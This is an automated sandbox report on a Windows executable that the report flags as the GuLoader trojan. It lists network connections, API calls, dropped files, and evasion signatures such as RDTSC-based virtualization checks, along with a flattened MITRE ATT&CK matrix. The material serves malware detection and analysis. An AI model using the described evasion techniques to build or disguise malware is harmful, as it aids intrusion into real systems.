      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49776 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49784 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49790 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49807 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49820 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49843 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49849 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49880 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49909 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49920 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49937 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49950 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49966 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49972 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49995 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:50001 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:50014 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:50022 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:50030 version: TLS 1.2
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405331
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,2_2_0040335A
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_00404B6E0_2_00404B6E
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_0040659D0_2_0040659D
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_00404B6E2_2_00404B6E
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_0040659D2_2_0040659D
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: String function: 00402B3A appears 51 times
      Source: TEC-SPC-94.03.60.175.07.exe, 00000000.00000000.2244496305.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs TEC-SPC-94.03.60.175.07.exe
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000000.2349678329.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs TEC-SPC-94.03.60.175.07.exe
      Source: TEC-SPC-94.03.60.175.07.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal68.troj.evad.winEXE@3/10@2/2
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_00404635 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404635
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeFile created: C:\Users\user\subacidity.lnkJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeFile created: C:\Users\user\AppData\Local\Temp\nsnE9D5.tmpJump to behavior
      Source: TEC-SPC-94.03.60.175.07.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: TEC-SPC-94.03.60.175.07.exeReversingLabs: Detection: 57%
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeFile read: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess created: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess created: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"Jump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: subacidity.lnk.0.drLNK file: ..\..\Program Files (x86)\Common Files\cutline.sil
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
      Source: TEC-SPC-94.03.60.175.07.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000002.00000002.3502635941.0000000003614000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2354906620.0000000006A84000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeAPI/Special instruction interceptor: Address: 73E329E
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeAPI/Special instruction interceptor: Address: 3F7329E
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeRDTSC instruction interceptor: First address: 73A0F05 second address: 73A0F05 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4F98507066h 0x00000008 cmp ecx, eax 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeRDTSC instruction interceptor: First address: 3F30F05 second address: 3F30F05 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4F98D7ABC6h 0x00000008 cmp ecx, eax 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe TID: 500Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004057D0
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_00402770 FindFirstFileW,2_2_00402770
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_004057D0
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_0040628B FindFirstFileW,FindClose,2_2_0040628B
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618336510.00000000068CB000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.00000000068C6000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2591610194.00000000068CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx8
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeAPI call chain: ExitProcess graph end nodegraph_0-4754
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeAPI call chain: ExitProcess graph end nodegraph_0-4755
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess created: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"Jump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_00405F6A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F6A

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping1
      Query Registry      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Virtualization/Sandbox Evasion      		LSASS Memory21
      Security Software Discovery      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager1
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS3
      File and Directory Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA Secrets23
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
